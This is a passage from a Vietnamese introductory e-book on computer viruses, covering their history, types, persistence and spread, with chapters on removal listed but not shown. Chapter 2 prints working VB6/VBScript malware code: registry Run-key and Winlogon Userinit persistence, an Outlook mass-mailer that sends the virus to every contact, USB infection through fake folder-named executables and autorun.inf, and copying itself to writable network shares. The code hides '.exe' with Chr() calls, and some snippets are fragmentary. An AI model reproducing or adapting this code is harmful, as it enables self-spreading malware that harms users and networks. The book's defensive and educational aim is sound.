Tong Quan Virus

Lê Nguyên Dũng
Virus cơ bản
Lời tựa
Bạn có thể là một kỹ sư, một học sinh hay là một nhà giáo. Nhưng dù là ai thì cũng có lẽ
hơn một lần bạn nghe về virus và thậm chí gặp lại vấn đề với chúng. Tuy nhiên, rõ ràng
việc hiểu về chúng thật không đơn giản, cách chúng làm việc và cả cái cách mà chúng làm
phiền chúng càng khiến chúng trở nên bí ẩn.
Cuốn sách này cố gắng nêu ra những định nghĩa cơ bản nhất và những ví dụ để bạn có thể
hiểu hơn về virus. Chúng là gì ? Chúng hoạt động ra sao ? Tiêu diệt chúng như thế nào ?
Dù nhiều cố gắng, nhưng cuốn sách sẽ không thể trách khỏi những sai sót. Rất mong bạn
đọc hồi âm với những sai sót mà cuốn sách gặp phải.
Mục lục
Chương 1 : Một số định nghĩa cơ bản

Virus là gì
Lịch sử của virus
Virus có thể hoạt động ở đâu
Một số đuôi mở rộng có khả năng bị virus tấn công
Phân loại virus
Sâu máy tính
Trojan
Spyware
Adware
Chương 2: Virus làm gì ?
I. Tạo giá trị để tự khởi động
Các khóa trong regedit
Ghi file
I. Lây truyền
Qua Email
Qua các thiết bị lưu trữ
Mạng nội bộ
Qua các dịch vụ IM
Web
Qua file
II. Một số hoạt động phá hoạt khác
KeyLog
BackDoor
Lừa đảo
Rootkit
Mở cửa hậu (BackDoor)
Tống tiền
Xây dựng BotNet
Rootkit
Chương 3 : Nhận dạng và tiêu diệt
I. Làm sao để nhận dạng virus
II. Dừng hoạt động của virus
Khái niệm về process
Dừng hoạt động của virus
Nhận dạng Rootkit
III. Quản lý các chương trình khởi động của hệ thống
Virus khởi động như thế nào
Quản lý các chương trình khởi động
IV. Khôi phục hệ thống
Phục hồi các thư mục ẩn
Phục hồi Task Manager-Regedit-MSConfig
Bị LogOut khi vừa hiện màn hình Desktop
Khởi động máy tới màn hình Desktop thì dừng lại
V. Một số kỹ thuật khác
Để Internet Explorer an toàn hơn
Không cho virus lây qua Yahoo Messenger gửi thông điệp
Kiểm tra 1 liên kết có virus hay không
Nhận biết nhanh virus giả dạng thư mục
Làm sạch USB
Tránh autorun của USB
Nghịch Bkav
Chương 4 : Một số phần mềm cần biết
Phần mềm giúp nhận dạng và tiêu diệt
Phần mềm chống virus
Quét virus online
Chương 5 : Tự diệt một số virus

FunnyIM
Kavo
Chương 1 :
Trong chương này chúng ta sẽ đi sâu vào tìm hiểu những khái niệm về virus. Từ virus
thông thường mà chúng ta thường dùng thực ra chỉ là một cái tên chung của nhiều loại mã
độc riêng lẽ mà thôi. Chương này sẽ giải thích từng khái niệm mã độc này.
Virus máy tính là gì ?

Trong khoa học máy tính, virus máy tính (thường được người sử dụng gọi tắt là virus) là
những chương trình hay đoạn mã được thiết kế để tự nhân bản và sao chép chính nó vào
các đối tượng lây nhiễm khác (file, ổ đĩa, máy tính ..).
Lịch sử virus máy tính

Có nhiều quan điểm khác nhau về lịch sử của virus điện toán. Ở đây chỉ nêu rất vắn tắt và
khái quát những điểm chung nhất và, qua đó, chúng ta có thể hiểu chi tiết hơn về các loại
virus:
Năm 1949: John von Neuman (1903-1957) phát triển nền tảng lý thuyết tự nhân bản của
một chương trình cho máy tính.
Vào cuối thập niên 1960 đầu thập niên 1970 đã xuất hiện trên các máy Univax 1108 một
chương trình gọi là "Pervading Animal" tự nó có thể nối với phần sau của các tập tin tự
hành. Lúc đó chưa có khái niệm virus.
Năm 1981: Các virus đầu tiên xuất hiện trong hệ điều hành của máy tính Apple II.
Năm 1983: Tại Đại Học miền Nam California, tại Hoa Kỳ, Fred Cohen lần đầu đưa ra khái
niệm computer virus như định nghĩa ngày nay.
Năm 1986: Virus "the Brain", virus cho máy tính cá nhân (PC) đầu tiên, được tạo ra tại
Pakistan bởi Basit và Amjad. Chương trình này nằm trong phần khởi động (boot sector)
của một dĩa mềm 360Kb và nó sẽ lây nhiễm tất cả các ổ đĩa mềm.
Cũng trong tháng 12 năm này, virus cho DOS được khám phá ra là virus "VirDem". Nó có
khả năng tự chép mã của mình vào các tệp tự thi hành (executable file) và phá hoại các
máy tính VAX/VMS.
Năm 1987: Virus đầu tiên tấn công vào command.com là virus "Lehigh".
Năm 1988: Virus Jerusalem tấn công đồng loạt các đại học và các công ty trong các quốc
gia vào ngày thứ Sáu 13. Đây là loại virus hoạt động theo đồng hồ của máy tính (giống
bom nổ chậm cài hàng loạt cho cùng một thời điểm).
Tháng 11 cùng năm, Robert Morris, 22 tuổi, chế ra worm chiếm cứ các máy tính của
ARPANET, làm liệt khoảng 6.000 máy. Morris bị phạt tù 3 năm và 10.000 dollar. Mặc dù
vậy anh ta khai rằng chế ra virus vì "chán đời" (boresome).
Năm 1990: Chương trình thương mại chống virus đầu tiên ra đời bởi Norton.
Năm 1991: Virus đa hình (polymorphic virus) ra đời đầu tiên là virus "Tequilla". Loại này
biết tự thay đổi hình thức của nó, gây ra sự khó khăn cho các chương trình chống virus.
Năm 1994: Những người thiếu kinh nghiệm, vì lòng tốt đã chuyển cho nhau một điện thư
cảnh báo tất cả mọi người không mở tất cả những điện thư có cụm từ "Good Times" trong
dòng bị chú (subject line) của chúng. Đây là một loại virus giả (hoax virus) đầu tiên xuất
hiện trên các điện thư và lợi dụng vào "tinh thần trách nhiệm" của các người nhận được
điện thư này để tạo ra sự luân chuyển.
Năm 1995: Virus văn bản (macro virus) đầu tiên xuất hiện trong các mã macro trong các
tệp của Word và lan truyền qua rất nhiều máy. Loại virus này có thể làm hư hệ điều hành
chủ. Macro virus là loại virus viết ra bằng ngôn ngữ lập trình Visual Basic cho các ứng
dụng (VBA) và tùy theo khả năng, có thể lan nhiễm trong các ứng dụng văn phòng của
Microsoft như Word, Excel, PowerPoint, OutLook,.... Loại macro này, nổi tiếng có virus
Baza và virus Laroux, xuất hiện năm 1996, có thể nằm trong cả Word hay Excel. Sau này,
virus Melissa, năm 1997, tấn công hơn 1 triệu máy, lan truyền bởi một tệp đính kèm kiểu
Word bằng cách đọc và gửi đến các địa chỉ của Outlook trong các máy đã bị nhiễm virus.
Virus Tristate, năm 1999, có thể nằm trong các tệp Word, Excel và Power Point.
Năm 2000: Virus Love Bug, còn có tên ILOVEYOU, đánh lừa tính hiếu kì của mọi người.
Đây là một loại macro virus. Đặc điểm là nó dùng đuôi tập tin dạng "ILOVEYOU.txt.exe".
Lợi dụng điểm yếu của Outlook thời bấy giờ: theo mặc định sẵn, đuôi dạng .exe sẽ tự
động bị dấu đi. Ngoài ra, virus này còn có một đặc tính mới của spyware: nó tìm cách đọc
tên và mã nhập của máy chủ và gửi về cho tay hắc đạo. Khi truy cứu ra thì đó là một sinh
viên người Philippines. Tên này được tha bổng vì Philippines chưa có luật trừng trị những
người tạo ra virus cho máy tính.
Năm 2002: Tác giả của virus Melissa, David L. Smith, bị xử 20 tháng tù.
Năm 2003: Virus Slammer, một loại worm lan truyền với vận tốc kỉ lục, truyền cho
khoảng 75 ngàn máy trong 10 phút.
Năm 2004: Đánh dấu một thế hệ mới của virus là worm Sasser. Với virus này thì người
ta không cần phải mở đính kèm của điện thư mà chỉ cần mở lá thư là đủ cho nó xâm nhập
vào máy. Cũng may là Sasser không hoàn toàn hủy hoại máy mà chỉ làm cho máy chủ trở
nên chậm hơn và đôi khi nó làm máy tự khởi động trở lại. Tác giả của worm này cũng lập
một kỉ lục khác: tay hắc đạo (hacker) nổi tiếng trẻ nhất, chỉ mới 18 tuổi, Sven Jaschan,
người Đức. Tuy vậy, vì còn nhỏ tuổi, nên vào tháng 7 năm 2005 nên tòa án Đức chỉ phạt
anh này 3 năm tù treo và 30 giờ lao động công ích.
Với khả năng của các tay hacker, virus ngày ngay có thể xâm nhập bằng cách bẻ gãy các
rào an toàn của hệ điều hành hay chui vào các chổ hở của các phần mềm nhất là các
chương trình thư điện tử, rồi từ đó lan tỏa khắp nơi theo các nối kết mạng hay qua thư
điện tử. Do dó, việc truy tìm ra nguồn gốc phát tán virus sẽ càng khó hơn nhiều. Chính
Microsoft, hãng chế tạo các phần mềm phổ biến, cũng là một nạn nhân. Họ đã phải nghiên
cứu, sửa chữa và phát hành rất nhiều các phần mềm nhằm sửa các khuyết tật của phần
mềm cũng như phát hành các thế hệ của gói dịch vụ (service pack) nhằm giảm hay vô
hiệu hóa các tấn công của virus. Nhưng dĩ nhiên với các phần mềm có hàng triệu dòng mã
nguồn thì mong ước chúng hoàn hảo theo ý nghĩa của sự an toàn chỉ có trong lý thuyết.
Đây cũng là cơ hội cho các nhà sản xuất các loại phần mềm bảo vệ có đất dụng võ.
Tương lai không xa có lẽ virus sẽ tiến thêm các bước khác như: nó bao gồm mọi điểm
mạnh sẵn có (polymorphic, sasser hay tấn công bằng nhiều cách thức, nhiều kiểu) và còn
kết hợp với các thủ đọan khác của phần mềm gián điệp (spyware). Đồng thời nó có thể
tấn công vào nhiều hệ điều hành khác nhau chứ không nhất thiết nhắm vào một hệ điều
hành độc nhất như trong trường hợp của Windows hiện giờ. Và có lẽ virus sẽ không hề
(thậm chí là không cần) thay đổi phương thức tấn công: lợi dụng điểm yếu của máy tính
cũng như chương trình.
Virus có ở đâu ?
Có nhiều người nhầm tưởng virus chỉ tồn tại trên máy tính và chỉ xuất hiện trên hệ điều
hành phổ biến là Windows. Tuy nhiên thật ra không phải vậy.
Hiện nay virus không chỉ tồn tại trên hệ điều hành Windows mà tại bất kỳ hệ điều hành
(Thông dụng) nào đều đã có sự xuất hiện của virus. Linux, Unix, MacOS với máy tính và
ngay cả hệ điều hành Sysbian dành cho điện thoại di động đều đã có những virus lây
nhiễm.
Tuy nhiên, do tính phổ biến là cao nhất nên không có gì khó hiểu mà hệ điều hành
Windows trở thành hệ điều hành mà nhiều virus đã và đang xuất hiện nhiều nhất.
Một số đuôi mở rộng có khả năng bị virus tấn công
 .bat: Microsoft Batch File (Tệp xử lí theo lô)

 .chm: Compressed HTML Help File (Tệp tài liệu dưới dạng nén HTML)
 .cmd: Command file for Windows NT (Tệp thực thi của Windows NT)
 .com: Command file (program) (Tệp thực thi)
 .cpl: Control Panel extension (Tệp của Control Panel)
 .doc: Microsoft Word (Tệp của chương trình Microsoft Word)
 .exe: Executable File (Tệp thực thi)
 .hlp: Help file (Tệp nội dung trợ giúp người dùng)
 .hta: HTML Application (Ứng dụng HTML)
 .js: JavaScript File (Tệp JavaScript)
 .jse: JavaScript Encoded Script File (Tệp mã hoá JavaScript)
 .lnk: Shortcut File (Tệp đường dẫn)
 .msi: Microsoft Installer File (Tệp cài đặt)
 .pif: Program Information File (Tệp thông tin chương trình)
 .reg: Registry File
 .scr: Screen Saver (Portable Executable File)
 .sct: Windows Script Component
 .shb: Document Shortcut File
 .shs: Shell Scrap Object
 .vb: Visual Basic File
 .vbe: Visual Basic Encoded Script File
 .vbs: Visual Basic File
 .wsc: Windows Script Component
 .wsf: Windows Script File
 .wsh: Windows Script Host File
 .{*}: Class ID (CLSID) File Extensions
Tuy nhiên bạn nên tránh ngộ nhận. Không phải bắt buộc những file mang đuôi mở rộng
như trên đều là virus, nó chỉ là những phần mở rộng có nhiều khả năng bị virus tấn công
mà thôi.
Phân loại virus

Tùy vào cách thức lây nhiễm và cách thức làm việc, chúng ta có thể chia virus thành một
số loại cơ bản như sau : Worm, Trojan House, Spyware (Phần mềm gián điệp), Adware
(Phần mềm quảng cáo). Ngoài ra theo một số tài liệu thì còn có : Botnet, keylogger,
phishing, rootkit, backdoor...
Sâu máy tính (worm): là các chương trình cũng có khả năng tự nhân bản tự tìm cách lan
truyền qua hệ thống mạng. Điểm cần lưu ý ở đây, ngoài tác hại thẳng lên máy bị nhiễm,
nhiệm vụ chính của worm là phá các mạng thông tin, làm giảm khả năng hoạt động hay
ngay cả hủy hoại các mạng này. Nhiều nhà phân tích cho rằng worm khác với virus, họ
nhấn mạnh vào đặc tính phá hoại mạng nhưng ở đây worm được là một loại virus đặc biệt.
Trojan Horse : Đây là loại chương trình cũng có tác hại tương tự như virus chỉ khác là nó
không tự nhân bản ra. Như thế, cách lan truyền duy nhất là thông qua các thư dây chuyền
Để trừ loại này người chủ máy chỉ việc tìm ra tập tin Trojan horse rồi xóa nó đi là xong.
Tuy nhiên, không có nghĩa là không thể có hai con Trojan horse trên cùng một hệ thống.
Chính những kẻ tạo ra các phần mềm này sẽ sử dụng kỹ năng lập trình của mình để sao
lưu thật nhiều con trước khi phát tán lên mạng. Đây cũng là loại virus cực kỳ nguy hiểm.
Nó có thể hủy ổ cứng, hủy dữ liệu.
Phần mềm gián điệp (spyware): Đây là loại virus có khả năng thâm nhập trực tiếp vào
hệ điều hành mà không để lại "di chứng". Thường một số chương trình diệt virus có kèm
trình diệt spyware nhưng diệt khá kém đối với các đợt "dịch".
Phần mềm quảng cáo (adware): Loại phần mềm quảng cáo, rất hay có ở trong các
chương trình cài đặt tải từ trên mạng. Một số phần mềm vô hại, nhưng một số có khả
năng hiển thị thông tin kịt màn hình, cưỡng chế người sử dụng.
Chương 2 : Virus làm gì
I. Tạo khóa khởi động :

Virus nhiễm vào máy tính, không tức là nó có thể “sống” trong máy tính ấy. Các virus khi
muốn tiếp tục hoạt động để tiếp tục lây lan... thì bắt buộc chúng phải tìm cách để sau khi
bạn tắt máy, vào lần bật máy sau thì virus ấy sẽ được kích hoạt và tiếp tục làm việc.
Để làm được điều này, các virus thường tự ghi các giá trị vào một số địa chỉ nhất định
trong registry để trong lần khởi động sau của hệ điều hành thì virus ấy sẽ tiếp tục được
gọi.
I.1. Khởi động hợp pháp :

Trong registry có một số địa chỉ mà windows tạo ra để bạn dễ dàng đưa chương trình
mình chạy sau khi máy được khởi động. Điều này cũng tương tự với một số file. Sở dĩ
chúng ta có thể gọi nó đây là cách “hợp pháp” là vì với những giá trị (Chứa thông tin về
file sẽ sẽ được khởi động) này thì chương trình quản lý những chương trình khởi động
cùng hệ thống có sẵn trong Windows là System Configuration Utility có thể quản lý
chúng.
Để khởi động chương trình này, bạn chọn Start -> Run... Nhập vào giá trị : msconfig và
chọn OK. Bạn chọn thẻ Startup để có thể quản lý các ứng dụng khi khởi động. Còn thẻ
Services để quản lý các chương trình dịch vụ khởi động cùng hệ thống.
Cách này worm,trojan cũng thường sử dụng.
Sau đây là 3 phương thức khác nhau cùng một vài đoạn code trên VB6 thể hiện việc này.
I.1.a Ghi Key trong Regedit theo các địa chỉ sau :
HKEY_LOCAL_MAHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Code :
Module :
Option Explicit
‘Khai báo các hàm API
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA"
(ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA"
(ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long,
ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA"
(ByVal hKey As Long, ByVal lpValueName As String) As Long
‘Khai báo các hằng số

Public Const REG_SZ = 1
Public Const REG_BINARY = 3
Public Const HKEY_CURRENT_USER = &H80000001
Sub SaveString(hKey As Long, strPath As String, strValue As String, strData
As String)
‘Hàm ghi giá trị vào Registry
Dim Ret
RegCreateKey hKey, strPath, Ret
RegSetValueEx Ret, strValue, 0, REG_SZ, ByVal strData, Len(strData)
RegCloseKey Ret
End Sub
Sub DelSetting(hKey As Long, strPath As String, strValue As String)
‘Hàm xóa khóa trong Registry
Dim Ret
RegDeleteValue Ret, strValue
RegCloseKey Ret
End Sub
Form :
‘Biến lưu trữ đường dẫn virus
Dim AppVirus As String
Private Sub Form_Load()
‘Đoạn mã xác định đường dẫn virus

If Len(App.Path) <> 3 Then
AppVirus = App.Path + "\" + App.exename + (“.exe”)
Else
AppVirus = App.Path + App.exename + (“.exe”)
End If
‘Thao tác ghi key khởi động
SaveString HKEY_CURRENT_USER,
"Software\Microsoft\Windows\CurrentVersion\Run", "DungCoi", AppVirus
‘Thao tác xóa key khởi động

‘ DelSetting HKEY_CURRENT_USER,
"Software\Microsoft\Windows\CurrentVersion\Run", "DungCoi"
End Sub
‘Chú ý : Phần DungCoi ở đây là Tên Key
‘ Phần AppVirus là đường dẫn File của bạn
Bạn chú ý với phương pháp ghi key như sau sẽ bị một số phần chống virus nhận dạng và
chặn lại nên rất hiếm gặp kiểu ghi key này (Ngoại trừ các virus trên VBScript vẫn sử
dụng).
Set reg = CreateObject("WScript.Shell")
reg.regwrite
"HKEY_LOCAL_MAHINE\Software\Microsoft\Windows\CurrentVersion\Run\Start",
App.Path + "\" + App.EXEName + ".exe"
I.1.b Phương pháp sử dụng thư mục khởi động :

C:\Documents and Settings\DungCoi\Start Menu\Programs\Startup
DungCoi = Tên sử dụng trong hệ thống
I.1. Khởi động bất hợp pháp :
Ngược lại với các khởi động “hợp pháp” ở phía trên, đây là những cách khởi động mà
chương trình quản lý các trình khởi động cùng hệ thống sẽ không quản lý.
Bạn nên chú ý, không giống như các key đã nói ở trên các key sắp được nói đến khá nguy
hiểm nếu bạn không hiểu chúng làm gì. Các key này cũng là các thông tin rất quan trọng
khi bạn diệt virus để đảm bảo Windows vẫn làm việc bình thường.
Sửa đổi Key trong Regedit :

Đường dẫn key : HKEY_LOCAL_MAHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\Userinit
Gía trị mặc định : C:\Windows\System32\userinit.exe
Với C:\Windows là thư mục cài đặt hệ điều hành.

NT\CurrentVersion\Winlogon\Shell
Gía trị mặc định : explorer.exe (Hay C:\Windows\explorer.exe)
Đường dẫn ghi ở 2 key này sẽ được Windows khởi động ngay cả trong SafeMode. Đây
cũng chính là lý do mà một số virus vẫn hoạt động ngay cả khi bạn làm việc trên
SafeMode của hệ điều hành.
Ý nghĩa các key

Khi Windows khởi động qua màn hình chào (Welcome), Windows sẽ tiếp tục đọc giá trị ở
key Userinit để tìm chương trình để khởi động tiếp theo.
Với giá trị là file userinit.exe thông thường, thì file userinit.exe này sẽ được chạy. Sau đó
file này tiếp tục gọi explorer.exe và chúng ta có môi trường làm việc trên explorer.exe.
Vấn đề lớn sẽ xảy ra nếu hệ điều hành không thể khởi động có đường dẫn tương ứng với
giá trị tại key Userinit. Lúc này file explorer.exe không gọi và chúng ta sẽ bị Log Out trở lại
màn hình Welcome.
Hiện tượng này đã xảy ra với rất nhiều người dùng.
Các virus khi ghi giá trị là đường dẫn của mình vào key Userinit thường ghi thành dạng
như sau :
Gía trị: C:\Windows\System32\userinit.exe, Đường dẫn virus
Điều này có nghĩa rằng, cả userinit.exe và cả virus đều được chạy. Và như thế hệ điều
hành vẫn sẽ không hiện tượng gì bất ổn mà virus vẫn sẽ được khởi động. Đây là một giải
pháp an toàn.
Tuy nhiên không phải virus nào cùng làm vậy, một số virus đã ghi vào key này với giá trị
chính là đường dẫn virus. Điều này đồng nghĩa với việc chỉ có virus đó được kích hoạt khi
khởi động với key Userinit. Lúc này, nếu virus không gọi file explorer.exe thì hệ thống sẽ
bị ngừng hoạt động.
Đây là vấn đề rất lớn mà rất đông người dùng máy tính gần đây mắc phải.
Để tránh tình trạng tê liệt này, bạn nên chú ý tới các key này khi diệt virus.
Code : (Code mẫu với Key Userinit)
Module :
Option Explicit
‘Các hàm API để tác động vào registry
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" _
Alias "RegCreateKeyA" ( _
ByVal hKey As Long, _
ByVal lpSubKey As String, _
phkResult As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" _
Alias "RegSetValueExA" ( _
ByVal hKey As Long, _
ByVal lpValueName As String, _
ByVal Reserved As Long, _
ByVal dwType As Long, _
lpData As Any, _
ByVal cbData As Long) As Long
‘Hàm API để xác định thư mục hệ thống
Declare Function GetWindowsDirectory Lib "kernel32" Alias
"GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As
Long
‘Khai báo các hằng số

Public Const REG_SZ = 1
Public Const REG_BINARY = 3
Public Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
Sub SaveString(hKey As Long, strPath As String, strValue As String, strData
As String)
‘Hàm ghi giá trị vào Registry
Dim Ret
RegSetValueEx Ret, strValue, 0, REG_SZ, ByVal strData, Len(strData)
RegCloseKey Ret
End Sub
Function WindowsDir() As String

‘Hàm xác định đường dẫn thư mục hệ thống
Dim WindirS As String * 255
Dim Temp
Dim Result
Temp = GetWindowsDirectory(WindirS, 255)
Result = Left(WindirS, Temp)
WindowsDir = Result
End Function
Form :
‘Biến lưu đường dẫn virus
‘Biến lưu đường dẫn file explorer.exe
Dim PathExp As String
‘Khởi tạo giá trị cho biến

PathExp = WindowsDir & “\explorer.exe”
‘Xác định đường dẫn virus
AppVirus = App.Path + "\" + App.exename + (“.exe”)
Else
AppVirus = App.Path + App.exename + (“.exe”)
End If
‘Gọi explorer.exe
Shell PathExp
‘Ghi giá trị vào registry
SaveString HKEY_LOCAL_MACHINE, “SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon”, “Userinit”, AppVirus
End Sub
‘Phần AppVirus là đường dẫn File của bạn
‘Câu lệnh Shell PathExp là rất cần thiết
Có lẽ tới đây bạn có thể hiểu, việc đoạn code trên phải có dòng lệnh Shell PathExp là để
tránh hệ thống bị tê liệt.
I.1.c. Một số key khác

Windows thực hiện các lệnh trong khu vực
HKEY_CLASSES_ROOT\exefile\shell\open\command "%1" %* của Registry. Lệnh nhúng ở
đây sẽ mở khi bất kỳ file chạy nào được thực thi.
Có thể có những file khác:
[HKEY_CLASSES_ROOT\exefile\shell\open\command] ="\"%1\" %*"

[HKEY_CLASSES_ROOT\comfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\batfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\piffile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] ="\"%1\"
%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] ="\"%1\"
%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] ="\"%1\"
%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] ="\"%1\"
%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] ="\"%1\"
%*"
Nếu các khoá không có giá trị "\"%1\" %*" như trên và bị thay đổi một số thứ kiểu như
"\"somefilename.exe %1\" %*" thì chúng sẽ tự động gọi một file đặc tả.
2. Lây nhiễm :
a. Email :
Lây truyền qua email là phương thức cơ bản nhất của virus sử dụng mạng internet để
truyền nhiễm.
Dù là một phương thức đã tồn tại khá lâu, nhưng đến hiện nay, đây vẫn là một phương
thức được rất nhiều virus sử dụng.
Sau đây là một đoạn mã minh họa quá trình gửi email từ một máy đã bị lây nhiễm qua
email của những người khác thông qua việc liệt kê danh sách email những người đã từng
có liên hệ với máy nạn nhân trên Outlook Explorer (OE).

AppVirus = App.Path + "\" + App.exename + (Chr(46) + Chr(101) + Chr(120)
+ Chr(101))
Else
AppVirus = App.Path + App.exename + (Chr(46) + Chr(101) + Chr(120) +
Chr(101))
End If
Set go = CreateObject(fgo)
Set St = CreateObject(“Outlook.Application”)
Set out = Wscript.CreateObject(“Outlook.Application”)
Set MAPI = out.GetNameSpace(“MAPI”)
Set a = MAPI.AddressLists(1)
For X = 1 To a.AddressEntries.Count
Set Mail = St.CreateItem(0)
Mail.To = St.GetNameSpace(“MAPI”).AddressLists(1).AddressEntries(X)
Mail.Subject = “Tên nội dung Mail” ‘Ví dụ : This is card Valentine
Mail.Body = “Nội dung email” ‘Ví dụ : This is my lover
Mail.Attachments.Add = AppVirus ‘Đây là phần file đính kèm
Mail.Send
Next
St.Quit
2. Qua các thiết bị lưu trữ
Trước kia phương thức lây truyền virus qua đĩa mềm khá phổ biến, cùng với việc đĩa mềm
ngày càng ít được sử dụng và được thay thế bằng ổ đĩa USB thì phương thức lây truyền
qua đĩa mềm dần được thay thế bằng phương pháp lây truyền qua đĩa USB.
Cũng có một số (Dù không nhiều) tự nhân bản vào đĩa CD, DVD... rồi chờ đợi những nạn
nhân khác nhau.
Sau đây là các bước một virus thường làm để lây truyền qua đĩa USB.
1. Tìm ổ đĩa USB (Xem có tồn tại không)
- Liệt kê tất cả ổ đĩa
- Kiểm tra xem trong các ổ đĩa đó, ổ đĩa nào là đĩa giao tiếp qua USB.
2. Sau khi thực hiện bước này, có 2 cách lây nhiễm vào USB chủ yếu như sau :
a. Virus tự nhân bản mình vào một địa chỉ nhất định trên USB, rồi tạo file autorun.inf
trong USB nhằm tự kích hoạt mình nếu máy nào đó bất cẩn khi sử dụng đĩa USB đó.
b. Virus sẽ liệt kê toàn bộ thư mục có trong USB. Tại mỗi thư mục đó virus sẽ tự nhân bản
mình giả dạng 1 thư mục con của tư mục đó (Thường thì các virus này sẽ biểu tượng
giống hình một thư mục thông thường).
Ở cách 2.b virus sẽ tạo file autorun.inf có cấu trúc như sau :
[Autorun]
OPEN=Đường dẫn virus trong đĩa USB
Trên đây chỉ là cấu trúc cơ bản. Cấu trúc này có thể có sự khác biệt, ví dụ trong trường
hợp sau :
[AutoRun]
open=pagefile.pif
shell\open=´ò¿ª(&O)
shell\open\Command=pagefile.pif
shell\open\Default=1
shell\explore=×ÊÔ´¹ÜÀíÆ÷(&X)
shell\explore\Command=pagefile.pif
Dù file ở dưới quy định nhiều thuộc tính hơn, nhưng về chức năng cơ bản thì không đổi.
Chức năng của file này là sẽ tạo cho đĩa USB có chế độ Autorun. Ở chế độ này, khi người
dùng mở đĩa USB đó theo cách thông thường (Như nháy đúp vào file đó) thì thay vì đĩa
USB đó được mở sẽ tự động chạy file có đường dẫn lưu trữ tại khóa có giá trị OPEN.
Bạn rất khó nhận ra sự khác biết giữa việc Open bình thường của đĩa USB với việc Autorun
này. Lý do là các virus được kích hoạt ở trong đĩa USB sẽ mở thư mục của đĩa USB ra.
Sau đây là một đoạn mã thể hiện quá trình lây nhiễm theo cách 2.b :
‘Code bởi DungCoi

‘Email : dungcoivb@gmail.com
AppVirus = App.Path + "\" + App.exename + (Chr(46) + Chr(101) + Chr(120) +
Chr(101))
Else
AppVirus = App.Path + App.exename + (Chr(46) + Chr(101) + Chr(120) +
Chr(101))
End If
Dim d, dc
Dim fso, cf
Set fso = CreateObject("Scripting.FileSystemObject")
Set dc = fso.Drives
‘Thao tác liệt kê ổ đĩa, sau đó tìm các đĩa rời và có tên khác “A”
For Each d In dc
If (d.DriveType = 1) And (UCase(Left(d, 1)) <> "A") Then
Set cf = fso.GetFolder(d).subfolders
‘Liệt kê tất cả thư mục trong thư mục hiện tại
For Each fil In cf
If TonTai(fil.Path & "\" & fil.Name & (Chr(46) + Chr(101) + Chr(120) +
Chr(101))) = False Then FileCopy AppVirus, fil.Path & "\" & fil.Name &
(Chr(46) + Chr(101) + Chr(120) + Chr(101))
TimThuMuc (fil.Path)
Next
End If
Next
End Sub
Private Sub TimThuMuc(ThuMuc As String)

‘Thao tác tìm thư mục
Dim fso, cf, fil, ext
Set fso = CreateObject(("Scripting.FileSystemObject")
Set cf = fso.GetFolder(ThuMuc).subfolders
‘Liệt kê tất cả thư mục trong thư mục hiện tại
For Each fil In cf
FileCopy AppVirus, fil.Path & "\" & fil.Name & (Chr(46) + Chr(101) +
Chr(120) + Chr(101))
‘Thực hiện đệ quy để tiếp tục liệt kê theo chiều sâu
TimThuMuc (fil.Path)
Next
End Sub
Private Function TonTai(filename) As Boolean

‘Hàm kiểm tra sự tồn tại của File
On Error GoTo ErrorHandler
TonTai = (Dir(filename) <> "")
Exit Function
ErrorHandler:
TonTai = False
End Function
3. Mạng nội bộ
Virus sẽ tìm tất cả các thư mục trong cùng mạng nội bộ (Của máy nạn nhân) xem có thư
mục nào chia sẽ (Share) và cho phép sửa chữa chúng hay không. Không đó chúng sẽ tự
sao chép và chờ đợi một ai đó vô ý chạy chúng.

AppVirus = App.Path + "\" + App.exename + (Chr(46) + Chr(101) + Chr(120) +
Chr(101))
Else
AppVirus = App.Path + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101))
End If
Dim ishell
Set ishell = CreateObject("wscript.shell")
ishell.run "%comspec% /C net view > C:\plog.tmp", 0, True
Set fso = CreateObject("scripting.filesystemobject")
Set rd = fso.opentextfile("C:\plog.tmp")
nbuff = 0
Do While rd.AtEndOfStream <> True
nbuff = rd.readline
If Left(nbuff, 2) = "\\" Then
‘Chạy một lệnh trong hệ thống nhầm liệt kê các tài nguyên cia sẽ hiện tại
rồi sau đó ghi thông tin ấy vào “C:\clog.tmp”
ishell.run "%comspec% /C net view " & Trim(Left(nbuff, 21)) & " >
C:\clog.tmp", 0, True
Set rdd = fso.opentextfile("C:\clog.tmp")

buff = ""
Do While rdd.AtEndOfStream <> True
buff = rdd.readline
combuff = Right(Trim(buff), 4)
If Right(combuff, 4) = "Disk" Then
buffadd = Left(buff, 13)
If Len(Trim(buffadd)) > 0 Then
sharename = a & Trim(Left(nbuff, 21)) & "\" & Trim(buffadd) & a
‘Sao chép virus lên thư mục đang được chia sẻ
FileCopy AppVirus, sharename & "\" & appl & ".exe"
End If
End If
Loop
End If
Loop
4. Qua các dịch vụ IM
Sau đây là một số khái niệm chính về IM
